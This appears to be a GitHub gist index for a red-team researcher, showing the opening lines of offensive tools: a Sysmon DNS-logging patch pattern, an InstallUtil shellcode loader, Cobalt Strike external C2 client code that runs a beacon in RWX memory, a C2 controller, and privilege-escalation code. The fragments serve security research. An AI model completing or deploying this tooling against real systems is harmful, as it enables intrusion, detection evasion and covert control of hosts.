xpn xpn

## PCMPBNMBAO_x86_poc.vba
' POC to spawn process with PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON mitigation enabled
' by @_xpn_
'
' Thanks to https://github.com/itm4n/VBA-RunPE and https://github.com/christophetd/spoofing-office-macro

Const EXTENDED_STARTUPINFO_PRESENT = &H80000
Const HEAP_ZERO_MEMORY = &H8&
Const SW_HIDE = &H0&
Const MAX_PATH = 260
Const PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY = &H20007

## tasks.cs
using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;

using System.Reflection;
using System.Reflection.Emit;

using System.Collections;
using System.Collections.Generic;

## dns_sysmon_patch.c
#include <iostream>
#include <Windows.h>
#include <WinDNS.h>

// Pattern for hunting dnsapi!McTemplateU0zqxqz
#define PATTERN (unsigned char*)"\x48\x89\x5c\x24\x08\x44\x89\x4c\x24\x20\x55\x48\x8d\x6c"
#define PATTERN_LEN 14

// Search for pattern in memory
DWORD SearchPattern(unsigned char* mem, unsigned char* signature, DWORD signatureLen) {

## InstallUtil-Shellcode-cs
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;

/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause

## clr_via_native.c
#include "stdafx.h"

int main()
{
	ICLRMetaHost *metaHost = NULL;
	IEnumUnknown *runtime = NULL;
	ICLRRuntimeInfo *runtimeInfo = NULL;
	ICLRRuntimeHost *runtimeHost = NULL;
	IUnknown *enumRuntime = NULL;
	LPWSTR frameworkName = NULL;

## external_client_filetransfer.cpp
#include "stdafx.h"

// Allocates a RWX page for the CS beacon, copies the payload, and starts a new thread
void spawnBeacon(char *payload, DWORD len) {

	HANDLE threadHandle;
	DWORD threadId = 0;
	char *alloc = (char *)VirtualAlloc(NULL, len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	memcpy(alloc, payload, len);

## external_client.cpp
#include "stdafx.h"

// Allocates a RWX page for the CS beacon, copies the payload, and starts a new thread
void spawnBeacon(char *payload, DWORD len) {

	HANDLE threadHandle;
	DWORD threadId = 0;
	char *alloc = (char *)VirtualAlloc(NULL, len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	memcpy(alloc, payload, len);

## external_controller.py
import socket
import struct
import time

class ExternalC2Controller:
    def __init__(self, port):
        self.port = port

    def encodeFrame(self, data):
        return struct.pack("<I", len(data)) + data

## getsystem_parent.cpp
#include "stdafx.h"

BOOL SetPrivilege(HANDLE hToken, LPCTSTR Privilege, BOOL bEnablePrivilege) {
	TOKEN_PRIVILEGES tp;
	LUID luid;
	TOKEN_PRIVILEGES tpPrevious;
	DWORD cbPrevious = sizeof(TOKEN_PRIVILEGES);

	if (!LookupPrivilegeValue(NULL, Privilege, &luid)) return FALSE;

## msigen.wix
<?xml version="1.0"?>
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
  <Product Id="*" UpgradeCode="12345678-1234-1234-1234-111111111111" Name="Example Product Name" Version="0.0.1" Manufacturer="@_xpn_" Language="1033">
    <Package InstallerVersion="200" Compressed="yes" Comments="Windows Installer Package"/>
    <Media Id="1" Cabinet="product.cab" EmbedCab="yes"/>

    <Directory Id="TARGETDIR" Name="SourceDir">
      <Directory Id="ProgramFilesFolder">
        <Directory Id="INSTALLLOCATION" Name="Example">
          <Component Id="ApplicationFiles" Guid="12345678-1234-1234-1234-222222222222">